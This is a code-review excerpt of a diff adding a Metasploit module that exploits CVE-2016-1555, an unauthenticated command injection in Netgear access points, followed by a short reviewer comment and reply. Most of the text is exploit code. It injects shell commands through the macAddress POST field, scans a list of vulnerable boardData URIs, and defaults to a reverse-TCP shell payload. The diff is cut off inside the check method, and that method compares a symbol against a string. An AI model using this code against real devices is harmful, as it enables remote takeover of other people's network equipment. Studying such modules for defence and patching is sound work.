modules/exploits/linux/http/netgear_unauth_exec.rb

```diff
@@ -0,0 +1,169 @@
+      'Description' => %q{
+        From the CVE-2016-1555 page: (1) boardData102.php, (2) boardData103.php,
+        (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in
+        Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350,
+        WNDAP360, and WNDAP660 before 3.5.5.0 allow remote attackers to execute
+        arbitrary commands.
+      },
+      'Author'      =>
+        [
+          'Daming Dominic Chen <ddchen[at]cs.cmu.edu>', # Vuln discovery
+          'Imran Dawoodjee <imrandawoodjee.infosec[at]gmail.com>' # MSF module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['CVE', '2016-1555'],
+          ['URL', 'https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic'],
+          ['PACKETSTORM', '135956'],
+          ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/112']
+        ],
+      'DisclosureDate' => 'Feb 25 2016', # According to http://seclists.org/fulldisclosure/2016/Feb/112
+      'Privileged'     => true,
+      'Platform'       => 'linux',
+      'Arch'           => ARCH_MIPSBE,
+      'Payload'        => {},
+      'DefaultOptions' => {
+        'PAYLOAD'  => 'linux/mipsbe/shell_reverse_tcp',
+        'WfsDelay' => 5 },
+      'Targets'        => [[ 'Automatic',	{ }]],
+      'DefaultTarget'  => 0
+      ))
+
+    register_options(
+      [
+        OptPath.new('URI_LIST', [true,  "The vulnerable URIs.", '/usr/share/metasploit-framework/data/wordlists/netgear_boardData_paths.txt']),
+        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 5]),
+      ])
+    deregister_options('SSL') # because victim side does not support SSL
+    deregister_options('SSLCert') # if SSL is disabled, might as well disable this for cleaner interface
+  end
+
+  # post request
+  def request_post(uri,command)
+    send_request_cgi({
+      'uri'    => uri,
+      'method' => 'POST',
+      'data'   => "macAddress=000000000000;#{command};&reginfo=1&writeData=Submit\r\n"
+    })
+  end
+
+  # get request
+  def request_get(uri)
+    send_request_cgi({
+      'uri'    => normalize_uri('/', uri),
+      'method' => 'GET'
+    })
+  end
+
+
+  # check for existence of vulnerable URIs
+  def find_uri
+    # read the file and loop through it to find the vulnerable URIs
+    File.read(datastore['URI_LIST']).each_line do |uri|
+      response_get = request_get(uri.chomp)
+      if response_get && response_get.code == 200
+        return uri.chomp
+      end
+    end
+
+    :fail
+  end
+
+
+  # check for vulnerability existence
+  def check
+    lhost = datastore['LHOST'] # implied, required for the "ping" check -_-
+    vuln_check_param = "echo asdf | " # make this an actual check instead of a ping
+    target_uri = find_uri
+    if target_uri == "fail"
+      vprint_error(Failure::NotVulnerable, 'Target is not vulnerable.')
```

Comment:
Close, but not quite. `vprint_error` does not accept `Failure` codes. Instead:

```ruby
vprint_error('Target is not vulnerable.')
return CheckCode::Safe
```

This method should also be refactored, but that can wait until it's functional.

Reply:
As of commit 1223229d1c1ee6ae48c199be3b736a93959b9bb5, this is redundant.